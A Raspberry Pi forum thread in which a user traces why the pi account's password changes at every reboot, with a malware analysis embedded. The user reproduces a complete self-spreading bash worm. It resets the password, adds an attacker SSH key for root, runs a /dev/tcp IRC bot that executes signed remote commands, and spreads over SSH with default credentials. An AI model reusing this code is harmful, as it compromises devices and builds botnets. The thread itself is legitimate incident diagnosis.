congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

[Investigation] pi's password is lost in every reboot issue

Sat May 18, 2019 7:03 pm

Hello everyone.

I'm investigating this issue: pi's password is lost in every reboot.
Issue summary: Change pi's password by passwd command -> reboot -> the changed password always will be changed to another which we don't know.

Yes, I know using default pi account is not good for security, but in this topic I just focus to the investigation of root cause.

After searching tons of result on Google (like these: https://raspberrypi.stackexchange.com/q ... ery-reboot and https://www.raspberrypi.org/forums/view ... p?t=195378 etc...) but don't have the solution for this strangle issue, I decided to investigate by myself. And I have fond out a half of the root cause.

I used this command to trace auth log

Code: Select all

sudo tail /var/log/auth.log -n 100
And I alway see this log at the shutdown step

Code: Select all

May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
Then I tried to rename usermod binary and shutdown

Code: Select all

sudo mv /usr/sbin/usermod /usr/sbin/usermod-dell
Then it worked, the usermod binary wasn't called and the password of pi account isn't changed after rebooting anymore.
So, it means something called usermod to change the password of pi account, but I still can't trace exactly something is what?
Does anyone has some recommends or advises for me, thank you so much.

This is full log of auth.log -n 100 command.

Code: Select all

[email protected]:~ $ sudo tail /var/log/auth.log -n 100
[sudo] password for rp:
May 19 00:19:20 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:19:31 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 00:19:31 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:19:38 raspberrypi systemd-logind[478]: New seat seat0.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:39 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:39 raspberrypi usermod[824]: change user 'pi' password
May 19 00:19:40 raspberrypi sshd[847]: Received SIGHUP; restarting.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on 0.0.0.0 port 22.
May 19 00:19:41 raspberrypi sshd[847]: Server listening on :: port 22.
May 19 00:19:46 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 00:19:46 raspberrypi systemd-logind[478]: New session c1 of user pi.
May 19 00:19:46 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 00:19:55 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:22:24 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo                                                                                        t ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by (uid=0)
May 19 00:22:24 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:22:36 raspberrypi passwd[2138]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:22:47 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo                                                                                        t ; COMMAND=/usr/bin/passwd pi
May 19 00:22:47 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by (uid=0)
May 19 00:22:55 raspberrypi passwd[2152]: pam_unix(passwd:chauthtok): password c                                                                                        hanged for pi
May 19 00:22:55 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:23:11 raspberrypi passwd[2163]: pam_unix(passwd:chauthtok): password c                                                                                        hanged for pi
May 19 00:24:04 raspberrypi passwd[2235]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:24:43 raspberrypi passwd[2254]: pam_unix(passwd:chauthtok): password c                                                                                        hanged for pi
May 19 00:24:49 raspberrypi sudo:       pi : TTY=pts/0 ; PWD=/home/pi ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 00:24:50 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by (uid=0)
May 19 00:24:57 raspberrypi systemd-logind[477]: New seat seat0.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on 0.0.0.0 port 22.
May 19 00:24:58 raspberrypi sshd[881]: Server listening on :: port 22.
May 19 00:24:58 raspberrypi usermod[861]: change user 'pi' password
May 19 00:25:03 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 00:25:04 raspberrypi systemd-logind[477]: New session c1 of user pi.
May 19 00:25:04 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 00:25:11 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:26:56 raspberrypi passwd[2064]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:27:10 raspberrypi passwd[2068]: pam_unix(passwd:chauthtok): authentica                                                                                        tion failure; logname= uid=1000 euid=0 tty= ruser= rhost=  user=pi
May 19 00:39:01 raspberrypi CRON[8534]: pam_unix(cron:session): session opened f                                                                                        or user root by (uid=0)
May 19 00:39:02 raspberrypi CRON[8534]: pam_unix(cron:session): session closed f                                                                                        or user root
May 19 00:44:32 raspberrypi sshd[9696]: pam_unix(sshd:auth): authentication fail                                                                                        ure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.155  user=rp
May 19 00:44:34 raspberrypi sshd[9696]: Failed password for rp from 192.168.1.15                                                                                        5 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: Accepted password for rp from 192.168.1.                                                                                        155 port 51768 ssh2
May 19 00:44:41 raspberrypi sshd[9696]: pam_unix(sshd:session): session opened f                                                                                        or user rp by (uid=0)
May 19 00:44:41 raspberrypi systemd-logind[477]: New session c2 of user rp.
May 19 00:44:41 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user rp by (uid=0)
May 19 00:44:57 raspberrypi sudo: pam_unix(sudo:auth): authentication failure; l                                                                                        ogname=rp uid=1003 euid=0 tty=/dev/pts/1 ruser=rp rhost=  user=rp
May 19 00:45:03 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/sbin/update-rc.d noip2.sh enable
May 19 00:45:03 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:45:04 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:45:36 raspberrypi smbd[10031]: pam_unix(samba:session): session opened                                                                                         for user pi by (uid=0)
May 19 00:46:55 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/local/bin/noip2 -S
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:46:55 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:49:17 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:49:17 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:51:24 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/passwd pi
May 19 00:51:24 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:51:30 raspberrypi passwd[11384]: pam_unix(passwd:chauthtok): password                                                                                         changed for pi
May 19 00:51:30 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 00:51:39 raspberrypi sudo:       rp : TTY=pts/1 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 00:51:39 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:51:39 raspberrypi sshd[9696]: pam_unix(sshd:session): session closed f                                                                                        or user rp
May 19 00:51:47 raspberrypi systemd-logind[475]: New seat seat0.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on 0.0.0.0 port 22.
May 19 00:51:48 raspberrypi sshd[882]: Server listening on :: port 22.
May 19 00:51:48 raspberrypi usermod[859]: change user 'pi' password
May 19 00:51:55 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 00:51:55 raspberrypi systemd-logind[475]: New session c1 of user pi.
May 19 00:51:55 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 00:52:01 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 00:54:58 raspberrypi sshd[2091]: Accepted password for rp from 192.168.1.                                                                                        155 port 51869 ssh2
May 19 00:54:58 raspberrypi sshd[2091]: pam_unix(sshd:session): session opened f                                                                                        or user rp by (uid=0)
May 19 00:54:58 raspberrypi systemd-logind[475]: New session c2 of user rp.
May 19 00:54:58 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user rp by (uid=0)
May 19 00:55:08 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 00:55:08 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 01:02:21 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/local/bin/noip2 -S
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 01:02:21 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 01:02:33 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/sbin/reboot
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session opened for use                                                                                        r root by rp(uid=0)
May 19 01:02:33 raspberrypi sshd[2091]: pam_unix(sshd:session): session closed f                                                                                        or user rp
May 19 01:02:33 raspberrypi sudo: pam_unix(sudo:session): session closed for use                                                                                        r root
May 19 01:02:33 raspberrypi polkitd(authority=local): Unregistered Authenticatio                                                                                        n Agent for unix-session:c1 (system bus name :1.12, object path /org/freedesktop                                                                                        /PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8) (disconnected from bus)
May 19 01:02:40 raspberrypi systemd-logind[480]: New seat seat0.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on 0.0.0.0 port 22.
May 19 01:02:41 raspberrypi sshd[879]: Server listening on :: port 22.
May 19 01:02:41 raspberrypi usermod[866]: change user 'pi' password
May 19 01:02:47 raspberrypi lightdm: pam_unix(lightdm-autologin:session): sessio                                                                                        n opened for user pi by (uid=0)
May 19 01:02:47 raspberrypi systemd-logind[480]: New session c1 of user pi.
May 19 01:02:47 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user pi by (uid=0)
May 19 01:02:53 raspberrypi polkitd(authority=local): Registered Authentication                                                                                         Agent for unix-session:c1 (system bus name :1.12 [lxpolkit], object path /org/fr                                                                                        eedesktop/PolicyKit1/AuthenticationAgent, locale en_GB.UTF-8)
May 19 01:04:53 raspberrypi sshd[2010]: Accepted password for rp from 192.168.1.                                                                                        155 port 51907 ssh2
May 19 01:04:53 raspberrypi sshd[2010]: pam_unix(sshd:session): session opened f                                                                                        or user rp by (uid=0)
May 19 01:04:53 raspberrypi systemd-logind[480]: New session c2 of user rp.
May 19 01:04:53 raspberrypi systemd: pam_unix(systemd-user:session): session ope                                                                                        ned for user rp by (uid=0)
May 19 01:05:01 raspberrypi sudo:       rp : TTY=pts/0 ; PWD=/home/rp ; USER=roo                                                                                        t ; COMMAND=/usr/bin/tail /var/log/auth.log -n 100
May 19 01:05:01 raspberrypi sudo: pam_unix(sudo:session): session opened for use  

User avatar
rpdom
Posts: 14068
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: [Investigation] pi's password is lost in every reboot issue

Sat May 18, 2019 9:21 pm

Try creating a "wrapper" script that pretends to be usermod, but dumps information to a file instead.

Something like

Code: Select all

#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "[email protected]"
) >>/tmp/usermod.log
There are probably more things you can add to track down what is calling it, maybe using the ps command and looking at the parent PID
Signature is on holiday.

congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 1:33 am

rpdom wrote:
Sat May 18, 2019 9:21 pm
Try creating a "wrapper" script that pretends to be usermod, but dumps information to a file instead.

Something like

Code: Select all

#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "[email protected]"
) >>/tmp/usermod.log
There are probably more things you can add to track down what is calling it, maybe using the ps command and looking at the parent PID
Thank you. I understand the idea but how can I create this wrapper? Is it a binary? Does it mean I will create code, compile to binary then overwrite original usermod binary? Could you please explain more details about the way to create this wrapper?

User avatar
ScriptBasic
Posts: 893
Joined: Wed Apr 03, 2019 5:53 pm
Location: Anacortes, WA USA
Contact: Website Twitter

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 1:35 am

Raspbian doesn't save the login info for a network connection either.

User avatar
Paeryn
Posts: 2512
Joined: Wed Nov 23, 2011 1:10 am
Location: Sheffield, England

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 2:08 am

congminh1709 wrote:
Sun May 19, 2019 1:33 am
rpdom wrote:
Sat May 18, 2019 9:21 pm
Try creating a "wrapper" script that pretends to be usermod, but dumps information to a file instead.

Something like

Code: Select all

#!/bin/bash
(
echo "usermod called at $(date)"
echo "env"
env
echo
echo "command line"
echo "[email protected]"
) >>/tmp/usermod.log
There are probably more things you can add to track down what is calling it, maybe using the ps command and looking at the parent PID
Thank you. I understand the idea but how can I create this wrapper? Is it a binary? Does it mean I will create code, compile to binary then overwrite original usermod binary? Could you please explain more details about the way to create this wrapper?
It's a shell script, a plain text file. You said you've already renamed the original usermod program so you already have the original as a backup. Type that shell script that rpdom gave into your text editor of choice and save it as /usr/sbin/usermod, you will need to run your editor with sudo to be able to save in that directory. Then you need to make it executable with sudo chmod +x /usr/sbin/usermod.

So (I use vim as my editor, you could use nano or any other depending on your preference),

Code: Select all

sudo vim /usr/sbin/usermod
<enter the shell script given, save and quit>
sudo chmod +x /usr/sbin/usermod
The next time that the culprit tries executing usermod the file /tmp/usermod.log will have some information about how it was called.
She who travels light — forgot something.

congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 3:22 am

Paeryn wrote:
Sun May 19, 2019 2:08 am
....
The next time that the culprit tries executing usermod the file /tmp/usermod.log will have some information about how it was called.
Thank you. I did it and this is the log result.
But I still can't trace exactly what called usermod?

Code: Select all

usermod called at Sun 19 May 10:03:01 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env

command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhk$

User avatar
rpdom
Posts: 14068
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 5:25 am

Ok, something that will give more information ( you may have to keep adding bits to this, depending on how it is being called) is to add this line inside your usermod wrapper script, anywhere between the two brackets ( ) will do.

Code: Select all

ps -p $PPID -o ruser,pid,ppid,cmd
That will display some information about the process that called usermod.
Signature is on holiday.

congminh1709
Posts: 4
Joined: Sun Apr 24, 2016 10:04 am

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 7:37 am

rpdom wrote:
Sun May 19, 2019 5:25 am
Ok, something that will give more information ( you may have to keep adding bits to this, depending on how it is being called) is to add this line inside your usermod wrapper script, anywhere between the two brackets ( ) will do.

Code: Select all

ps -p $PPID -o ruser,pid,ppid,cmd
That will display some information about the process that called usermod.
Thank you so much. Finally I have fond out it!! Windows Defender warns me this is a virus.
I shared here for everyone can reference.
It looks like a virus?

Code: Select all

usermod called at Sun 19 May 14:26:41 +07 2019
env
TERM=linux
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
LANG=en_GB.UTF-8
SHLVL=2
_=/usr/bin/env
RUSER      PID  PPID CMD
root       597   590 /bin/bash /opt/M8Zsr10D

command line
-p $6$vGkGPKUr$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi
/opt/M8Zsr10D content

Code: Select all

#!/bin/bash

MYSELF=`realpath $0`
DEBUG=/dev/null
echo $MYSELF >> $DEBUG

if [ "$EUID" -ne 0 ]
then 
	NEWMYSELF=`mktemp -u 'XXXXXXXX'`
	sudo cp $MYSELF /opt/$NEWMYSELF
	sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local"
	sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local"
	sudo sh -c "echo 'exit 0' >> /etc/rc.local"
	sleep 1
	sudo reboot
else
TMP1=`mktemp`
echo $TMP1 >> $DEBUG

killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
killall kaiten
killall perl

echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc

usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi

mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B"  >> /root/.ssh/authorized_keys

echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/ktx*
rm -rf /tmp/cpuminer-multi
rm -rf /var/tmp/kaiten

cat > /tmp/public.pem <<EOFMARKER
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs
glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW
rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF
WRq+Z8HYMvPlgSRA3wIDAQAB
-----END PUBLIC KEY-----
EOFMARKER

BOT=`mktemp -u 'XXXXXXXX'`

cat > /tmp/$BOT <<'EOFMARKER'
#!/bin/bash

SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do

	arr[0]="ix1.undernet.org"
	arr[1]="ix2.undernet.org"
	arr[2]="Ashburn.Va.Us.UnderNet.org"
	arr[3]="Bucharest.RO.EU.Undernet.Org"
	arr[4]="Budapest.HU.EU.UnderNet.org"
	arr[5]="Chicago.IL.US.Undernet.org"
	rand=$[$RANDOM % 6]
	svr=${arr[$rand]}

	eval 'exec 3<>/dev/tcp/$svr/6667;'
	if [[ ! "$?" -eq 0 ]] ; then
			continue
	fi

	echo $NICK

	eval 'printf "NICK $NICK\r\n" >&3;'
	if [[ ! "$?" -eq 0 ]] ; then
			continue
	fi
	eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
	if [[ ! "$?" -eq 0 ]] ; then
		continue
	fi

	# Main loop
	while [ true ]; do
		eval "read msg_in <&3;"

		if [[ ! "$?" -eq 0 ]] ; then
			break
		fi

		if  [[ "$msg_in" =~ "PING" ]] ; then
			printf "PONG %s\n" "${msg_in:5}";
			eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
			if [[ ! "$?" -eq 0 ]] ; then
				break
			fi
			sleep 1
			eval 'printf "JOIN #biret\r\n" >&3;'
			if [[ ! "$?" -eq 0 ]] ; then
				break
			fi
		elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
			privmsg_h=$(echo $msg_in| cut -d':' -f 3)
			privmsg_data=$(echo $msg_in| cut -d':' -f 4)
			privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)

			hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
			sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`

			if [[ "$sign" == "$hash" ]] ; then
				CMD=`echo $privmsg_data | base64 -d -i`
				RES=`bash -c "$CMD" | base64 -w 0`
				eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
				if [[ ! "$?" -eq 0 ]] ; then
					break
				fi
			fi
		fi
	done
done
EOFMARKER

chmod +x /tmp/$BOT
nohup /tmp/$BOT 2>&1 > /tmp/bot.log &
rm /tmp/nohup.log -rf
rm -rf nohup.out
sleep 3
rm -rf /tmp/$BOT

NAME=`mktemp -u 'XXXXXXXX'`

date > /tmp/.s

apt-get update -y --force-yes
apt-get install zmap sshpass -y --force-yes

while [ true ]; do
	FILE=`mktemp`
	zmap -p 22 -o $FILE -n 100000
	killall ssh scp
	for IP in `cat $FILE`
	do
		sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF [email protected]$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberry ssh [email protected]$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
		sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF [email protected]$IP:/tmp/$NAME  && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh [email protected]$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
	done
	rm -rf $FILE
	sleep 10
done

fi



User avatar
rpdom
Posts: 14068
Joined: Sun May 06, 2012 5:17 am
Location: Chelmsford, Essex, UK

Re: [Investigation] pi's password is lost in every reboot issue

Sun May 19, 2019 8:46 am

Yes, your Pi has been compromised. It is accessible by someone from outside who can do whatever they like on it. It's not just the "pi" password that has been changed, they have allowed "root" access from somewhere else.

Turn it off now. Pull the power. Install a fresh copy of Raspbian on the card to completely destroy everything that was on it and start again. The first thing you need to do then is to change the "pi" password, preferably before connecting it to a network.
Signature is on holiday.

Return to “Troubleshooting”